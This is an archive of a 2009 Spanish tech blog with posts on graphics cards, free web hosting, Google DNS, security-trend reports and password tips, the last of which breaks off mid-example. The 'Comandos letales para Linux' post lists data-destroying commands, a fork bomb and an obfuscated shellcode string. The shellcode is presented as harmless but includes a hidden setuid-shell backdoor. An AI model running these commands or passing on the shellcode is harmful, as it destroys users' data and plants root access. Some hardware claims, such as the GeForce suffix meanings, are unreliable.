miércoles, 23 de diciembre de 2009

Puntos que mirar para seleccionar una tarjeta de video (Parte II)

Una tarjeta de video, es algo esencial en los tiempo actuales, y no estoy hablando solamente de la parte de los juegos (que es por lo que más me preguntan mis alumnos), también sirve para ver con mas realismo los videos (obviamente los originales, las copias piratas dejan mucho que desear) e inclusive si queremos algo tan tonto tecnológicamente como tener la salida de nuestro computador en un monitor de 32’’ o superior.

Recientemente, varios amigos de Twitter y amigos 1.0 me han preguntado sobre que es lo que necesitan saber realmente para comprar la tarjeta de video de sus sueños.

Lo primero que debemos tomar en cuenta

Aunque suene pedante, lo primero a tomar en cuenta es tu presupuesto. Y no es broma, las tarjetas de videos buenas pueden a llegar a costar entre 350$ a 800$, mientras que las mas económicas rondan entre los 50$ y 120$. Así que están advertidos.

Otro punto muy importante es conocer que tipo de tarjeta de video acepta tu tarjeta madre ya sea AGP o PCI-Express

Por ultimo, debes pensar cuidadosamente para que la vas a utilizar, te recomiendo este artículo para que salgas de dudas Que debo mirar al comprar una tarjeta de video

Diferencia entre tarjetas AGP y PCI-Express

Son muchas las diferencias de las tarjetas de video, desde los voltajes, tipo de conectores y velocidades de transmisión. Un articulo mas técnico puede visitar Significado de los 1x, 2x, 4x, 8x y 16x en las Tarjetas de Video

agptipos[1]

PCXSLOTS

¿Que marca debo Comprar?

A nivel mundial, existen varias marcas en el mercado, pero solo existen 2 GPU que son considerados los mejores:

ati_logo Existe desde el Año 2000, actualmente esta en alianza con los procesadores AMD.

Existen diferentes series: R100, R200, R300, R420, R520, R600, R700 y Evergreen para los modelos con Directx9.

A partir de la serie R300, los número de la tarjeta tienen cierto significado:

  • **0**, **1**, **2**, **3**, **4**: Si posee alguno de estos números en el modelo de tarjeta, se refiere a que son tarjetas de videos básicas que generalmente cuestan menos de 99$ y poseen como sufijo SE y HM.
  • **5**, **6**, **7**: Se consideran tarjetas de video Principales, son las que mejor equilibran precio/valor. Tienen un costo promedio entre 100$ y 150$, pueden tener como sufijo XT, XL, Pro, SE, GTO, GT.
  • **8**, **9**: Se considera a este tipo de tarjeta especiales para entusiasta y profesionales. Son las que ofrecen los mejores rendimientos. Su precios están por encima de los 150$, pueden tener los sufijos XTX, XT, XT PL, Pro, GTO, GT.

A partir de la la serie HD 3000, la terminación de los sufijos PRO, XT, XTX, y GT cambio por 2 dígitos del modelo. Quedando lo significado de la siguiente manera:

  • 000-300: Tarjetas de Videos Integradas, generalmente toman memoria de la RAM del computador.
  • 330-590: Son tarjetas de videos básicas. Generalmente con poca memoria de video (64 o 128Mb). Excelente para Juegos Básicos.
  • 600-790: Son Tarjetas de videos normales. Equilibran la relación Precio Valor. Excelentes para Juegos Básicos, y procesamiento de gráficos a nivel básico o medio.
  • 800-990: Son las tarjetas de videos para Entusiastas y Profesionales. Excelentes para Juegos de Alto rendimiento, Renderizado 3D y procesamiento de imágenes.

ATI RADEON ya no se venden a minoristas; en cambio, vende su tecnología a terceros: Diamond Multimedia, Sappire Technology, Asustek, HIS – Hightech Information System, MSI – Micro Star International, PowerColor, GygaByte, VisionTek, Gainward y XFX.

Si desea conocer mas sobre ATI y los sufijos pueden visitar:

ATI

Sufijos de ATI Radeon

nvidia-2Para muchos, la mejor tarjeta de video del mundo, y no es para menos, esta recomendada por mas del 80% de los juegos a nivel mundial. Es una compañía con larga tradición en lo que a video se refiere (nació en 1993) y posee un centenar de premio a la excelencia de sus productos.

Pero esta compañía no solo fabrica Tarjetas de Video, también fabrican Tarjetas Madres, procesadores gráficos para celulares, y posiblemente a mediano o largo plazos procesadores para computadores.

Ahí varios modelos de tarjetas nVIDIA (que irónicamente se pronuncia casi igual que la palabra inglesa envy que quiere decir envidia) dependiendo para su uso: NV1, Riva, TNT, GeForce, Quadro, Tesla, GoForce, Tengra y uno modelos desarrollados exclusivamente para PlayStation y Xbox.

En este articulo me centrare en la mejor conocidas de las tarjetas nVIDIA, las Tarjetas de Videos GeForce.

Las tarjetas de videos GeForce se dividen en Series y Sufijos, así los primeros números de la tarjeta te indican la serie, mientras los Sufijos te indican hacia que sector están orientado la tarjeta.

  • Series 256: La primera de las serie GeForce, y una de las primeras tarjetas de videos en poseer memoria DDR
  • Series 2: posee las misma características que la serie 256, pero mucho mas baratas
  • Series 3: trae de soporte hasta Directx 8, e introduce los pixel shaders, que son una serie de instrucciones para el rederizado de imagenes.
  • Series 4: muy superior a la Series 3, agregar nuevas funciones en lo que respecta a manejo de memoria entre otra.
  • Series FX: Es la quinta generación de tarjetas de video, mejoraron el control de memoria, soporte para DirectX 7 y 8 y utiliza la nueva versión de Shaders 2.0
  • Series 6: Agrega el soporte a Shaders 3.0, introduce la tecnología SLI y PureVideo (eliminando la necesidad de un software decodificador para DVD)
  • Series 7: Diseñando originalmente solo para puertos AGP (sin embargo se consiguen pocos modelos en PCI-Express), mejoran en muestreo de los gráficos y los Anti-Aliasing y soporte para DirectX 9.
  • Series 8: Primera tarjeta de Video pensada exclusivamente para el puerto PCI-Express (sin embargo, con el tiempo, lanzaron al mercado modelos de menor rendimiento con puerto AGP), también es la primera en implementar nativamente el DirectX10.
  • Series 9: Fueron una prueba de concepto de lo que podían hacer con los procesadores de videos de la Series 8, inclusive debido a los resultado de su desarrollo nacieron tarjetas como la 8800 GT. Se empieza a trabajar con procesadores doble núcleo y doble bus para dar un mayor procesamiento.
  • Series 100: Fueron tarjetas de videos con el chip de la Series 9, pero reempacado con mejores prestaciones. Oficialmente se conoce que estas tarjetas no están a la venta para el publico general.
  • Series 200: El primer gran cambio en la nomenclatura GeForce, ahora ya no existirán sufijo sino Prefijo indicando el rango de la tarjeta, para después indicar el numero de modelo.
  • Series 300: Son las de mas reciente aparición. Fueron anunciada el 27 de Noviembre de 2009. Y entre sus principales características están el soporte al nuevo conjunto de instrucciones DirectX 10.1

Todas las tarjetas de Videos GeForce, a partir de la Series FX, se divide por un rango de valores para indicar el sector al que va dirigido, y una terminación en letra para indicar su prestaciones. Exceptuando los de la Series 200 y 300 que sustituye el Sufijo por el Prefijo.

  • 000 – 550: Son tarjetas de videos para usos básicos, obtienen un rendimiento aceptables para Juegos Basicos. Pueden ser de tipo SE, LE, GS y GT
  • 600 – 750: Son tarjetas de videos diseñada par uso normales, obtienen un buen rendimiento para Juegos Basicos, y rendimiento aceptable para Juegos Avanzados o Diseño Gráfico Básico o Medio. Pueden ser de tipo LE, GS, GSO, GT, GTS.
  • 800 - 950: Son tarjetas de videos diseñadas para Entusiastas de Video y Profesionales. Ofrecen Muy altos Rendimientos para Juegos Avanzados, Diseños Gráficos Avanzado (3D, CAD, Etc). Pueden ser de tipo GS, GT, GTS, GTO, GTX y Ultra.
  • En las Series 2 y Series 3, solo existirán 260 y 280, y se le agregaran los Prefijo GS, GT y GTX para indicar que la tarjeta es GS = Básica, GT = Normal y GTX = Avanzada.

Significado de los Prefijo y Sufijos de las tarjetas nVIDIA:

  • LE: Lite Edition, se refiere a la versión piloto de la tarjeta
  • SE: Second Edition, una evolución de la primera tarjeta
  • GS: Graphics Support, se podría decir que es como la tercera versión de la tarjeta de video. Normalmente trae instrucciones para su detección como Tarjeta de Video.
  • GT: Graphics Talent, La versión definitiva de la tarjeta
  • GTS: Graphics Talent Support, Segunda versión de la tarjeta definitiva. Generalmente solo trae mejoras a niveles de rendimientos y temperatura
  • GTX: Graphics Talent eXtreme, Tarjetas de Videos generalmente Overclockeadas o SuperClockeadas.
  • GTX-U o Ultra: Graphics Talent eXtreme Ultra: Versión para experto, trae muchas opciones personalizables a nivel de rendimiento de la tarjeta de video.

Si Desean mas información pueden revisar:

GeForce

Que es Nvidia? y Significado de GT… GTX (edit)

martes, 22 de diciembre de 2009

Pasos para registrar un dominio gratuito y conectarlo con DreamWeaver CS4 (Parte I)

Adobe Dreamweaver CS4 se ha ganado en aprecio de muchos diseñadores y programadores alrededor del mundo. Entre su ventaja más destacada es la de poder conectarse directamente a un sitio web a través del protocolo FTP.


El objetivo de esta guía es doble; ofrecer al que la lea un paso a paso para registrar un sitio Web de forma gratuita, y por la otra conectar el Dreamweaver a dicho sitio web.
Creación del Sitio Web


En Internet, es posible conseguir muchos sitios web gratuitos, pero si queremos un hospedaje semi-professional debemos tener los siguientes elementos:


· Panel de Control: Es un sitio centralizado para poder gestionar de manera Web todo aquello requerimientos que necesite el hospedaje


· Cuentas FTP: Al menos deberíamos tener una cuenta para poder acceder a sitio de Hospedaje Web por dicho protocolo, y así realizar las transferencia necesaria para nuestro sitio.


· Tener acceso a los protocolos HTTP (Servicio de Hosting)


· Tener como mínimo los software necesario para nuestra página


- Entorno PHP: PHP y MySQL Instalado


- Entorno ASP: ASP, .NET Framework, ODBC, Frontpage Extensions


Los otros complementos que puede tenet un Sitio Web (Correo Electronico, Lista de Correo, Python, Ruby on Rails, etc), podemos considerados añadidos, que para el principiante no son tan necesario.


De todos los servicios de hosting que he visto últimamente en internet, el mejor que he conseguido es 000webhost, el cual es gratuito y contiene las características antes mencionadas.


En está guía utilizaremos los servicios de dicha página, no por ello quiere decir que otros sevicios no sirvan.


Pasos para afiliarse al servicio de 000webhost

1) Entrar en la siguiente dirección: http://www.000webhost.com/231112.html registrarse


2) En la pantalla que te aparece seleccionar la opción de Sign Up (Registrarse)


3) En la siguiente pantalla que aparece, ahí que llenar los datos que se nos piden


· Debemos seleccionar si debemos conectar nuestro servicio de hosting con un dominio previamente comprado (.COM, .NET, .ORG) o si queremos utilizar uno de sus subdominios. Si elegimos la primera opción, debemos proporcionar el nombre del dominio comprado, para luego apuntarlo a nuestro servicio de hosting; si elegimos la segunda opción solo debemos elegir


un nombre de subdominio. He de acotar que el nombre del dominio varia con el tiempo y es cuestión de suerte dominio


4) Escribir el nombre a quien corresponderá la cuenta, así como el correo de contacto para la cuenta, es muy importante que sea uno verdadero y que se encuentre activo, ya que la información de configuración de la cuenta será enviada allí nombre y correo




5) Escribimos la contraseña, y la comprobamos en la casilla de abajo contraseña




6) Escribimos el código de verficación, el típico caso de CATCHA para comprobar que somos humanos y no una máquina tratando de registrarse.
verificacion




7) Marcamos la casilla de verificación, y le damos crear cuenta aceptar




Una vez terminado estos pasos, la página web tardara entre 2 a 5 minutos preparando la cuenta
 completando la configuracion




Nos dará un resumen de la información sobre nuestro sitio web completado




Si seguimos más abajo, nos encontraremos con la información que necesitamos…. La de los servidores FTP









ftp

lunes, 14 de diciembre de 2009

Comandos letales para Linux

Los usuarios de Linux siempre presumen de lo potente que es el intérprete de comandos, que les permite controlar nuestro sistema a su antojo y con una potencia que es muy difícil de lograr con un entorno gráfico. Sin embargo,“la potencia sin control no sirve de nada e incluso puede causar estragos".

A diferencia de otros sistemas operativos, en las distribuciones Linux hay comandos o combinaciones de comandos que pueden acabar con todo aquello en lo que habíamos trabajado en nuestro sistema.

Es precisamente lo que nos recuerdan desde Linux * Screw, donde avisan que jamás se deben ejecutar estos comandos en una consola. ¡¡Quedan advertidos!!

1. Cualquiera de estos comandos borrará todo lo que tengáis en tu directorio personal, en la raíz o en el disco:

sudo rm -rf /
rm -rf .*
dd if=/dev/zero of=/dev/sda
mkfs.ext3 /dev/hda
loquesea > /dev/hda
cd ~; for x in `ls`; do mv -f $x $y; y=$x; done
find -type f -mtime +30 -exec mv {} /dev/null \;
mv ~ /dev/null
mv / /dev/null

2. Con estos comandos conseguirás un kernel panic o dejar tu sistema tonto:

dd if=/dev/random of=/dev/port
:(){:|:&};:
A esto último se le conoce como fork bomb

3. Comando que hace lo mismo que “rm -rf /”, pero a la inversa:

char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

4. Con este ya no podrás ejecutar comandos con privilegios de superusuario:

rm -f /usr/bin/sudo;rm -f /bin/su

Linux en el tiempo

Como alguno de mis amigos y colegan saben, no soy muy Linuxeros, pero siempre he apoyado a la comunidad de software libre ya que es el camino que a la larga llegara la computación.

Y es que, el universo Linux se compone de muchas distribuciones diferentes, aunque casi siempre se habla de las mismas. Ubuntu es la más popular, pero no es la única ni mucho menos. ¿Cuándo ha nacido cada distribución y cuál es su raiz?. En futurist han preparado una estupenda gráfica donde se ve claramente la edad y de dónde procede cada distrubución. Un recurso interesante para conocer mejor quién es quien dentro del mundillo Linux.


Seguridad y virtualización: La nube trae oportunidades

Ante el auge del cloud computing y las tecnologías de virtualización, los ciberdelincuentes están poniendo su mira en estos entornos. Estas dos tecnologías convivirán con otros ciberobjetivos: el protocolo en pruebas para internet IPv6, que sustituirá al actual IPv4; y los nuevos dominios en alfabetos no latinos. Sin olvidar, por supuesto, a las redes sociales, que seguirán como una de las fuentes de amenazas emergentes. Así, se abren nuevas oportunidades de negocio. Los vendors de seguridad están apostando a pleno a ese segmento para el año que viene. ¿El canal está preparado para tomar el desafío?

Una de las conclusiones del Informe Anual de Amenazas de Trend Micro 2010 es sinceramente demoledora: mientras la industria del mal siga siendo una industria, con un flujo de ingresos, los cibercriminales no acabarán con su actividad. "Todo gira en torno al dinero, por lo que los ciberdelincuentes no desaparecerán", resalta.

Las ventajas, especialmente en términos de ahorro de costos, que permite la adopción de tecnologías como el cloud computing o virtualización, tan en auge en estos momentos, están conllevando que los cibercriminales estén viendo en estos segmentos una oportunidad atractiva para introducir sus ataques. Como apunta Trend Micro en su Informe de Amenazas para 2010, los delincuentes informáticos están al acecho para comenzar a atentar contra la seguridad en estos entornos.

Sin embargo, la evolución de las empresas hacia entornos de computación basados “en la nube de Internet”, así como en los virtualizados, no son los únicos que se van a ser objeto de ataques el próximo 2010. Así, de acuerdo con esta firma, el creciente uso de estas redes y el incremento de las comunidades llevarán a que los delincuentes que operan en Internet destinen más esfuerzos a atentar contra estos sitios web, como ha ocurrido recientemente con Facebook y el robo de información personal del que han sido víctimas muchos de sus usuarios.

Otro de los aspectos mencionados en este informe es que los ataques de malware están pasando de ser globales a locales, con ataques dirigidos, una estrategia similar a la empleada por Conficker, el gusano que este 2009 ha sido una de las grandes amenazas para la seguridad de muchos equipos. La era de las epidemias globales podría haber llegado a su fin, dando paso a los ataques dirigidos y localizados.

Junto a todo esto, Trend Micro también destaca otras tendencias que se verán a lo largo del próximo 2010, como el hecho de que los ataques de malware serán más sofisticados, cambiando su forma en pocas horas, lo que hará más difícil su detección y eliminación. Además, otro de los aspectos a los que habrá que prestar especial cuidado es al hecho de que, ahora, la profesionalidad de las amenazas por parte de los ciberdelincuentes hará que sólo una visita a un sitio Web sea suficiente para que un usuario esté infectado por un virus, con lo que habrá que tener mayor cautela a la hora de acceder a determinadas páginas de Internet.

Asimismo, otro de los puntos que no hay que olvidar según se apunta en este informe es que, ante el impacto que ha tenido el lanzamiento de Windows 7, los delincuentes también buscarán formas para explotar las carencias en seguridad que pueda tener el nuevo sistema operativo de Microsoft.

Ante estas amenazas, desde Trend Micro recuerdan la importancia que tiene el disponer de las últimas actualizaciones de seguridad, estar alerta y no abrir mensajes de correo electrónico de remitentes desconocidos, comprar en sitios web en los que se sepa a ciencia cierta que son seguros y, no olvidar no utilizar siempre la misma contraseña para acceder a diferentes sitios Web.

jueves, 3 de diciembre de 2009

Google Public DNS, otro paso más en la conquista de la red

Hace algunos horas informabamos sobre el camio de imagen que sufrio Cada día estoy más convencido del objetivo de Google de crear una Internet en la que ellos controlen todo, desde la infraestructura de red hasta las aplicaciones que se ofrecen, dejando a los demás el proveerles de contenidos para sus servicios. El último paso que han dado para ello es Google Public DNS.

El servicio DNS es el que se encarga de convertir las direcciones legibles por humanos, por ejemplo www.cantv.net a direcciones IP, en este caso 200.109.127.137. Normalmente, cada proveedor de Internet ofrece servidores para realizar esta función, aunque lo cierto es que no siempre estos son los óptimos.

Google Public DNS quiere ser el servidor DNS elegido por los usuarios y, para ello, se propugnan como muy rápidos y seguros. Con la infraestructura de la que disponen es fácil ser muy rápidos y por lo que respecta a la seguridad también han implementado una serie de medidas para que el servicio no se vea afectado.

Configurarlo es tan sencillo como ir a las preferencias de red de nuestro ordenador y utilizar los servidores 8.8.8.8 y 8.8.4.4. Eso sí, mejor probarlo bien antes de convertirnos en clientes habituales de este servicio para ver si la velocidad ofrecida es mejor o peor que la que nos da nuestro ISP.


Google Cambia su página de Inicio

Hace pocos minutos, Google Search acaba de hacer un cambio importante en la página principal a nivel mundial.... redujo la cantidad de elementos visible al cargar la página web del buscador.

Sin embargo, los elementos siguen estando disponible a través de un efecto de Fade-In al mover el ratón por encima de la página.

Hemos de recordar que Google es uno de los buscadores más utilizado a nivel mundial y siempre se ha caracterizado por tener un interfaz simple.

Lo interesante del asunto, es que el curso aparece directamente en la barra de búsqueda para iniciar inmediatamente la búsqueda.

Asi le dejo las imágenes del cambio.

Imagen Antes del Fade-IN

Imagen después del Fade-IN

Para más información, pueden ir al Blog Oficial de Google, al articulo

martes, 1 de diciembre de 2009

Twitter se viste de Rojo, Google No

Como entusiasta de la tecnlogía y los sucesos que marcarón un hito que cambiarón nuestra concepción de la vida. Siempre he considerado que el virus del VIH o mejor conocido como SIDA ha causado mucho daño a nuestra sociedad.

Dede su descubrimiento en 1983, ha a millones de personas en todo el mundo.

Por eso el 1ero de Diciembre, se realiza una campaña a nivel mundial, promocionada por OMS para prevenir esta terrible enfermedad.

Twitter, se ha introducido en esa onda y ha cambiado los colores oficiales de su página del Azul Cielo al Rojo Vinotinto.



Lo extraño es que la página de Google no hizo ningún cambio en su Logotipo, lo cual viendolo desde un punto de vista neutral me parece ilógico que conmemoren hecho como los 25 años de la llegada del Hombre a la Luna, o el 1er Mundial de OVNI pero no algo tan transcendental como el Dial Mundial de la prevención de SIDA.

Muy mal de parte de Google.

P.S. He revisado las páginas de Google Venezuela, Argentina, Mexico, España, Chile y Estado Unidos, solo en la página principal de Estados Unidos, aparece un enlace hacia una pagina principal de día del HIV, pero creo que Google debió enfatizar esa campaña a nivel mundial y no solo enmarcada en los Estados Unidos

miércoles, 25 de noviembre de 2009

Lego Matrix Trinity Help

Como no todo en la vida debe ser seriedad... aqui le dejo una buena animación de Matrix pero hecha en Lego; una de las escenas clave de la Pelicula.... Matrix Trinity Help


martes, 24 de noviembre de 2009

CiberGuerra, ya una realidad

Modificación del escenario I "Ciberguerra"

Los estudios desarrollados por los investigadores de McAfee siempre aportan información importante para la mejor toma de decisiones, pero esta vez lograron despertar un grado de atención cercano a la alarma cuando lanzaron una seria advertencia sobre la posibilidad de que esté comenzando una ciberguerra. En el informe, McAfee insta a los sectores públicos y privados a compartir más información para soportar una posible guerra informática.

Los investigadores de McAfee publicaron su quinto informe anual sobre Criminología Virtual en el que se concluye en la necesidad de que los sectores público y privado colaboren de una manera más efectiva para asegurar que las infraestructuras nacionales críticas sean capaces de soportar cualquier ciberataque.

El trabajo de investigación afirma que el primer paso para prepararse para este escenario es poner en marcha una definición precisa de lo que es la guerra cibernética, diferenciándola, por ejemplo, de los ataques lanzados por los usuarios descontentos con un Estado. "La definición tendría que tener en cuenta el origen del ataque, la motivación, la escala y el nivel de sofisticación", explicó Greg Day, analista de seguridad de McAfee. "Es un término tan utilizado que se debe establecer un marco de trabajo para lo que se puede denominar ciberataque, de forma que el sector público y el gubernamental puedan entender el problema".

El especialista de McAfee también dijo que "la mayor parte de la infraestructura crítica de un país está en manos del sector privado, por lo que es vital que las organizaciones gubernamentales y privadas mantengan diálogos sobre qué medidas proactivas y qué precauciones se deben tomar, pues la guerra informática podría ocurrir en el futuro porque es más barata, fácil y menos sangrienta que la real".

Modificación del escenario II "Educación como blanco"

WatchGuard elaboró un estudio sobre las principales amenazas que afectan a la seguridad informática de escuelas y universidades, pues considera que los incidentes relacionadas con la educación se incrementarán. El estudio parte de la base de una estadística del Departamento de Seguridad Nacional de Estados Unidos, según la cual el 25% de todas las infracciones de ciberseguridad se dan en los ambientes educativos.

Según WatchGuard, se estima que los peligros que se citan a continuación liderarán las amenazas a redes, aplicaciones y datos en los entornos educativos:

Malware y Spyware – En la medida en que los estudiantes y las facultades utilizan la web con propósitos educativos así como para entretenimiento, muchos se exponen sin darse cuenta a descargas por error, o a páginas web corruptas que inyectan diferentes tipos de software malicioso en sus computadoras. Una vez infectados, se arriesgan a ser víctimas de robos de identidad o pérdidas de información personal a través de spyware y keyloggers.

Virus – Actualmente, el email sigue siendo una de las principales vías para el suministro de virus. Lamentablemente, un reciente estudio pone de manifiesto que el 27% de los usuarios no mantiene sus antivirus actualizados. Con virus que adquieren propiedades polimórficas, las firmas de antivirus por si solas no son suficientes para detener la próxima oleada de nuevos virus.

Botnets – Se estima que entre el 15 y 20% de los sistemas informáticos de todas las universidades y escuelas que están conectados a Internet forma parte de una botnet o red zombie. Como parte de una botnet, los sistemas de los centros educativos pueden utilizarse en una amplia variedad de exploits desconocidos, incluyendo la distribución de spam, ataques de negación de servicio, clics fraudulentos, robo de identidad y otros muchos.

Phishing – Las estafas de phishing continúan ganando sofisticación y son más selectivas, estando algunas de ellas específicamente dirigidas a los estudiantes. Según un informe, los ataques de phishing a través de redes sociales alcanzan un ratio de éxito del 70%, porcentaje que indica que la mayoría de los estudiantes son vulnerables a este tipo de estafas.

Hacking – Tal y como revela un estudio realizado entre profesionales de IT del sector educativo, el 23% situó a los estudiantes “hackers” como una de las mayores amenazas a la seguridad de su red. Si los ataques son diseñados para alterar notas o calificaciones o con propósitos más siniestros, estos estudiantes que son piratas informáticos, continúan llevando al límite las redes y la protección de datos.

Control de Acceso – El uso de dispositivos móviles y el acceso inalámbrico continúa siendo una molestia para los administradores de red. La preocupación por impedir el acceso a usuarios no autorizados a los recursos de ITI de los centros educativos es el objetivo de muchos administradores. En la medida en que la utilización de dispositivos móviles se está incrementando, las escuelas deberán enfrentarse a mayores retos a la hora de gestionar el acceso autorizado a la red.

Redes Sociales – El número uno de las amenazas a las redes de las escuelas y universidades son las redes sociales como Facebook o MySpace. Lamentablemente, éstas actúan como la plataforma perfecta para lanzar miles de ataques contra estudiantes y facultades, incluyendo spam, virus, malware o phishing, entre otros. A esto se suma que los ataques de ingeniería social son, a menudo, extremadamente exitosos debido al entorno de “confianza” que las redes sociales crean.

Dada la naturaleza sensible tanto de estudiantes como de la información de las facultades, que poseen datos sobre números de la seguridad social, de tarjetas de crédito y otra información de identificación personal sensible, WatchGuard recomienda que las escuelas y universidades revisen sus controles de seguridad y políticas de IT con regularidad para cerciorarse de que cuentan con las soluciones de seguridad más efectivas y actualizadas.

“Con tanto en riesgo y tanto que ganar por parte de los cibercriminales, los campus en la actualidad son uno de los entornos IT más peligrosos”, explicó Eric Aarrestad, Vicepresident de WatchGuard Technologies. “A diferencia de las empresas, que pueden dedicar importantes recursos a la protección de la red y de los datos, las escuelas y las universidades tienen recursos más limitados, sin embargo se enfrentan a algunos de los retos de seguridad sirviéndose de la interacción entre estudiantes y los recursos de TI de sus escuelas”.

Modificación del escenario III "Mac y Smart Phones como blancos”

Symantec publicó sus predicciones sobre tendencias de seguridad online para 2010. Según este estudio, los antivirus ya no serán suficientes, ya que se ha llegado a un punto de inflexión donde ya no tiene sentido centrarse exclusivamente en el análisis de malware. También pronostica que el spam se incrementará de forma importante para Mac y smart phones.

Symantec estima que las aplicaciones de terceros en las redes sociales se convertirán en objetivo primordial de fraude durante 2010. No obstante, en el mismo sentido, se espera que los propietarios de estos sitios creen medidas de seguridad más proactivas para hacer frente a estas amenazas.

Por otro lado, en 2010, se espera que los propagadores de estafas de software de seguridad maligno lleven sus esfuerzos al siguiente nivel. Podrían hacerlo mediante el secuestro de equipos, haciéndolos inservibles y pidiendo un rescate por ello.

En cuanto al nuevo sistema operativo de Microsoft, Symantec afirma que no va a ser ninguna excepción en cuanto objetivo de ataque y cuando Windows 7 llegue, se encontrará también la manera de atacar a sus usuarios.

En lo que se refiere a los niveles de spam, mientras la economía siga en crisis y haya gente que busque aprovecharse de las débiles restricciones del Acta CAN SPAM, se verán más organizaciones no autorizadas vendiendo listas de direcciones de e-mail y legitimando estas listas de spam en los mercados.

Finalmente, se prevé una proliferación de los malware altamente especializados que se descubrieron en 2009 y cuyo objetivo era la explotación de los cajeros automáticos, demostrando un alto grado de posesión de información privilegiada sobre su funcionamiento y explotación. Se espera que esta tendencia continúe en 2010, incluyendo la posibilidad de malware en los sistemas de votación electrónica, usados en elecciones políticas y votaciones telefónicas públicas, como las vinculadas a programas reality o concursos.

Redes sociales amenazadas

La empresa AVG anunció que utilizando la tecnología LinkScanner puede detectar la presencia de páginas web especialmente programadas que amenazan a las redes sociales. La práctica de la incorporación de URL abreviada en redes sociales como Twitter o en los posts de Digg se ve amenazada por delincuentes informáticos que utilizan el anonimato de estas URL para ocultar páginas maliciosas.

AVG escanea el destino de cada enlace URL en tiempo real y no se basa en las listas negras que quedan obsoletas tan pronto como se crean debido a los continuos cambios en las ubicaciones donde se ocultan los hackers.

El problema con vínculos abreviados es que generalmente no son parecidos a la URL original por lo que los usuarios no siempre saben dónde están entrando. Los usuarios hacen click en una URL con la intención de ir a un sitio específico, pero el vínculo puede ser fácilmente atacado para enviar a las personas a un sitio que contiene troyanos, spyware, rootkits y otro malware en su lugar.

Las páginas web maliciosas son la herramienta más reciente que los piratas informáticos y los spammers utilizan para depositar malware en equipos a fin de robar contraseñas. Los usuarios de computadoras se pueden infectar simplemente por hacer clic en un vínculo, ver una imagen o desplazar sólo su ratón sobre un banner.

Modificación del escenario V: "La madurez del crimeware"

ESET desarrolló un informe sobre las tendencias que se esperan para el próximo año en materia de códigos maliciosos y seguridad antivirus. Se espera que el crimeware sea el vector de ataque sobresaliente debido a la tendencia de los ciberatacantes a monetizar su tarea. En este informe encontrará las definiciones más importantes del cibercrimen y las expectativas que se tienen en América Latina.

ESET inauguró sus oficinas regionales en Buenos Aires y cuenta con un laboratorio especialmente dedicado a vigilar los incidentes del malware en América Latina.

Descargue aquí este informe especial realizado por ESET Latinoamérica diseñado especialmente para la región por su equipo de especialistas.

Modificación del escenario VI: "El lucro detrás de las amenazas digitales"

Son múltiples los sistemas de ataque que se descubren cada día y las formas de obtener beneficio económico que encuentran las redes de ciberdelincuentes: desde el alquiler de redes zombies por horas y con soporte técnico para atacar webs de comercio electrónico. En este sentido, Kaspersky Lab ha presentado una guía práctica para todos los usuarios de Internet donde aconseja cómo permanecer a salvo del cibercrimen.

En “Tu guía para frenar el cibercrimen", Kaspersky Lab aconseja sobre cómo protegerse de muchas amenazas en Internet, como de los ataques de hackers, phishing, ransomware, etc.

El cibercrimen está muy cerca y cualquiera que navegue por Internet puede ser su víctima. Por esta razón, Kaspersky Lab ha presentado una guía práctica para todos los usuarios de Internet donde se aconseja cómo permanecer a salvo del cibercrimen.

“Los tiempos en que los creadores de virus y otros códigos maliciosos se reivindicaban diciendo que lo hacían por probarse a si mismos y al mundo que eran mejores que quienes intentaban proteger sus sistemas, ya han pasado. El lucro y el beneficio económico ha reducido a estos “románticos" a una parte marginal del mundo de las amenazas digitales", comenta Ricardo Hernández, director técnico de Kaspersky Lab Iberia.

Son múltiples los sistemas de ataque que se descubren cada día y las formas de obtener beneficio económico que encuentran las redes de ciberdelincuentes: desde el alquiler de redes zombies por horas y con soporte técnico para atacar webs de comercio electrónico o llevar a cabo campañas masivas de spam, hasta portales de subastas de nuevas vulnerabilidades de día cero, pasando por troyanos multibanco, que se quedan “dormidos" sin realizar ninguna acción para no ser detectados y que en el momento en que se accede a una cuenta de banca online inyectan un código en los navegadores para pedir más datos (como la clave PIN del cajero).

“Los usuarios somos cada día más conscientes de los riesgos que entrañan estas nuevas formas de ataque, pero, por supuesto, no queremos renunciar a las ventajas que Internet nos ofrece", continúa Hernández. Por esta razón, Kaspersky Lab ha publicado “Tu guía para frenar el cibercrimen", donde se informa de los distintos códigos maliciosos y estafas que nos podemos encontrar y se dan las claves para descubrir si nuestros ordenadores están infectados, así como consejos para evitar caer en la trampa.

“Aunque suene a vieja frase hecha, la mejor defensa contra estos nuevos tipos de ataques no es ni más ni menos que el viejo sentido común. Usar la cabeza y la lógica cuando utilizamos los medios digitales en nuestra vida", finaliza Hernández.

Enlace de descarga de “Tu guía para frenar el cibercrimen” en español en formato PDF.

martes, 17 de noviembre de 2009

Hackeada Pagina de la Secretaria de Desarrollo Rural de Puebla Mexico


Justo cuando me voy a acostar, mis amigos mexicanos me somprenden con esta noticia de hackeo a La página web de la Secretaría Rural de Puebla, cada vez ahi mas hackeo a paginas web del gobierno en Latinoamerica.

Actualizado 17/11/2009

La pagina fue hackeado hoy 17 de Noviembre de 2009, y a la 1am Hora Venezuela sigue hackeada

Aquí le dejo el enlace si la quieren ver, y mañana la subo a un servidor para que puedan conocer mas sobre los requerimientos de los protestantes


lunes, 16 de noviembre de 2009

Una guía para seleccionar claves

En mis revisión en búsqueda de nuevos contenido para mi blog y website, me tope con que la empresa de seguridad ETEK desarrolló una guía para crear passwords seguros partiendo de la base que el acceso al correo electrónico, efectuar los pagos a través de Internet u obtener acceso a información confidencial se ha convertido en todo un ejercicio de psicología y la palabra elegida como contraseña, en la mayoría de los casos, revela aspectos de la personalidad del usuario.

Estrategias para seleccionar passwords

Utilizar frases de cuentos para niños:
Frase: Mambrú se fue a la Guerra.
Password: msfa#lAguer.

Utilizar Trabalenguas:
Trabalengua: 3 tristes tigres fueron a comer trigo en 3 tristes trastos.
